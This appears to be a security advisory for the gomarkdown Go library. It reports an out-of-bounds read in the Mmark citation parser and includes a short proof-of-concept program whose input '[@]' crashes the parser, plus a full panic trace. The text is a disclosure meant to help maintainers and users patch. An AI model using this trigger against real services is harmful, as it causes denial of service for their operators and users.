Parsing malformed markdown input with parser that uses parser.Mmark extension could result in out-of-bounds read vulnerability.
To exploit the vulnerability, parser needs to have parser.Mmark extension set. The panic occurs inside the citation.go
file on the line 69 when the parser tries to access the element past its length.
package main
import (
"github.com/gomarkdown/markdown"
"github.com/gomarkdown/markdown/parser"
)
func main() {
ext := parser.CommonExtensions |
parser.Attributes |
parser.OrderedListStart |
parser.SuperSubscript |
parser.Mmark
p := parser.NewWithExtensions(ext)
inp := []byte("[@]")
markdown.ToHTML(inp, p, nil)
}
$ go run main.go
panic: runtime error: index out of range [1] with length 1
goroutine 1 [running]:
github.com/gomarkdown/markdown/parser.citation(0x10?, {0x1400000e3f0, 0x14000141801?, 0x3}, 0x0?)
/Users/demon/go/pkg/mod/github.com/gomarkdown/[email protected]/parser/citation.go:69 +0x544
github.com/gomarkdown/markdown/parser.link(0x14000152000?, {0x1400000e3f0?, 0x3?, 0x3?}, 0x14000141ad8?)
/Users/demon/go/pkg/mod/github.com/gomarkdown/[email protected]/parser/inline.go:308 +0x1c0
github.com/gomarkdown/markdown/parser.(*Parser).Inline(0x14000152000, {0x102d87f48, 0x14000076180}, {0x1400000e3f0, 0x3, 0x3})
/Users/demon/go/pkg/mod/github.com/gomarkdown/[email protected]/parser/inline.go:38 +0xb8
github.com/gomarkdown/markdown/parser.(*Parser).Parse.func1({0x102d87f48?, 0x14000076180}, 0x0?)
/Users/demon/go/pkg/mod/github.com/gomarkdown/[email protected]/parser/parser.go:307 +0x8c
github.com/gomarkdown/markdown/ast.NodeVisitorFunc.Visit(0x140000106e0?, {0x102d87f48?, 0x14000076180?}, 0x68?)
/Users/demon/go/pkg/mod/github.com/gomarkdown/[email protected]/ast/node.go:574 +0x38
github.com/gomarkdown/markdown/ast.Walk({0x102d87f48, 0x14000076180}, {0x102d87348, 0x140000106e0})
/Users/demon/go/pkg/mod/github.com/gomarkdown/[email protected]/ast/node.go:546 +0x58
github.com/gomarkdown/markdown/ast.Walk({0x102d877b0, 0x14000076120}, {0x102d87348, 0x140000106e0})
/Users/demon/go/pkg/mod/github.com/gomarkdown/[email protected]/ast/node.go:557 +0x144
github.com/gomarkdown/markdown/ast.WalkFunc(...)
/Users/demon/go/pkg/mod/github.com/gomarkdown/[email protected]/ast/node.go:580
github.com/gomarkdown/markdown/parser.(*Parser).Parse(0x14000152000, {0x1400000e3f0?, 0x0?, 0x0?})
/Users/demon/go/pkg/mod/github.com/gomarkdown/[email protected]/parser/parser.go:304 +0x16c
github.com/gomarkdown/markdown.Parse({0x1400000e3f0?, 0x3f?, 0x14000141e38?}, 0x102c6b43c?)
/Users/demon/go/pkg/mod/github.com/gomarkdown/[email protected]/markdown.go:53 +0x6c
github.com/gomarkdown/markdown.ToHTML({0x1400000e3f0?, 0x0?, 0x60?}, 0x0?, {0x0, 0x0})
/Users/demon/go/pkg/mod/github.com/gomarkdown/[email protected]/markdown.go:77 +0x30
main.main()
/Users/demon/tools/markdown_cve_poc/main.go:17 +0x5c
exit status 2
Summary
Parsing malformed markdown input with parser that uses parser.Mmark extension could result in out-of-bounds read vulnerability.
Details
To exploit the vulnerability, parser needs to have parser.Mmark extension set. The panic occurs inside the
citation.go
file on the line 69 when the parser tries to access the element past its length.markdown/parser/citation.go
Line 69 in 7478c23
PoC
Impact
Denial of Service / panic